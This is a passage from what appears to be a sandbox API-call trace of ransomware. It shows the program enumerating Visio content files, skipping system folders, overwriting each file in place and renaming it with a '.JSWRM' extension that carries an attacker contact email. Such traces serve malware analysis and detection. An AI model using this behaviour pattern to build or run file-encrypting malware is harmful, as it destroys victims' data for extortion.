cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK3_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK3_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK3_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK3_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.924] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK3_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block3_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.925] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=74351) returned 1 [0144.925] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.926] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12260, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x12260, lpOverlapped=0x0) returned 1 [0144.933] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.933] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12260, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x12260, lpOverlapped=0x0) returned 1 [0144.933] CloseHandle (hObject=0x314) returned 1 [0144.934] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK3_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block3_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK3_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block3_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.935] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3bf7740, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3bf7740, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3bf7740, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x110c9, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCK3_U.VSSX", cAlternateFileName="BLOCK3~2.VSS")) returned 1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2=".") returned 1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2="..") returned 1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2="...") returned 1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2="windows") returned -1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2="recovery") returned -1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2="perflogs") returned -1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2="documents and settings") returned -1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2="system volume information") returned -1 [0144.935] lstrcmpiW (lpString1="BLOCK3_U.VSSX", lpString2="msocache") returned -1 [0144.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK3_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK3_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK3_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK3_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCK3_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCK3_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK3_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block3_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.937] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=69833) returned 1 [0144.937] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.937] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x110c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x110c0, lpOverlapped=0x0) returned 1 [0144.944] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.944] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x110c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x110c0, lpOverlapped=0x0) returned 1 [0144.944] CloseHandle (hObject=0x314) returned 1 [0144.944] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK3_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block3_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCK3_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\block3_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.946] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19d7f1e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x19d7f1e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1a24140, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x14888, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCKP_M.VSSX", cAlternateFileName="BLOCKP~1.VSS")) returned 1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2=".") returned 1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2="..") returned 1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2="...") returned 1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2="windows") returned -1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2="recovery") returned -1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2="perflogs") returned -1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2="documents and settings") returned -1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2="system volume information") returned -1 [0144.946] lstrcmpiW (lpString1="BLOCKP_M.VSSX", lpString2="msocache") returned -1 [0144.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKP_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKP_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.948] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=84104) returned 1 [0144.948] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.948] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x14880, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x14880, lpOverlapped=0x0) returned 1 [0145.144] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.144] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x14880, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x14880, lpOverlapped=0x0) returned 1 [0145.145] CloseHandle (hObject=0x314) returned 1 [0145.145] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.148] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x60af, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCKP_M.VSTX", cAlternateFileName="BLOCKP~1.VST")) returned 1 [0145.148] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2=".") returned 1 [0145.148] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2="..") returned 1 [0145.148] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2="...") returned 1 [0145.148] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2="windows") returned -1 [0145.148] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2="recovery") returned -1 [0145.148] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2="perflogs") returned -1 [0145.148] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2="documents and settings") returned -1 [0145.148] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.148] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2="system volume information") returned -1 [0145.149] lstrcmpiW (lpString1="BLOCKP_M.VSTX", lpString2="msocache") returned -1 [0145.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKP_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0145.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_M.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_M.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKP_M.VSTX", lpUsedDefaultChar=0x0) returned 13 [0145.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.151] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=24751) returned 1 [0145.151] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.152] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x60a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x60a0, lpOverlapped=0x0) returned 1 [0145.167] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.167] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x60a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x60a0, lpOverlapped=0x0) returned 1 [0145.167] CloseHandle (hObject=0x314) returned 1 [0145.167] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.169] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c6049a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c6049a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c6049a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x13f09, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCKP_U.VSSX", cAlternateFileName="BLOCKP~2.VSS")) returned 1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2=".") returned 1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2="..") returned 1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2="...") returned 1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2="windows") returned -1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2="recovery") returned -1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2="perflogs") returned -1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2="documents and settings") returned -1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2="system volume information") returned -1 [0145.169] lstrcmpiW (lpString1="BLOCKP_U.VSSX", lpString2="msocache") returned -1 [0145.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKP_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0145.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKP_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0145.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0145.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0145.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0145.172] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=81673) returned 1 [0145.172] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.172] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x13f00, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x13f00, lpOverlapped=0x0) returned 1 [0145.181] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0145.181] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x13f00, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x13f00, lpOverlapped=0x0) returned 1 [0145.183] CloseHandle (hObject=0x314) returned 1 [0145.185] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLOCKP_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\blockp_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0145.187] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4986ebe, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4986ebe, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4986ebe, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x5f13, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLOCKP_U.VSTX", cAlternateFileName="BLOCKP~2.VST")) returned 1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2=".") returned 1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2="..") returned 1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2="...") returned 1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2="windows") returned -1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2="recovery") returned -1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2="perflogs") returned -1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2="documents and settings") returned -1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2="system volume information") returned -1 [0145.187] lstrcmpiW (lpString1="BLOCKP_U.VSTX", lpString2="msocache") returned -1 [0145.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKP_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0145.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0145.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLOCKP_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLOCKP_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0145.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 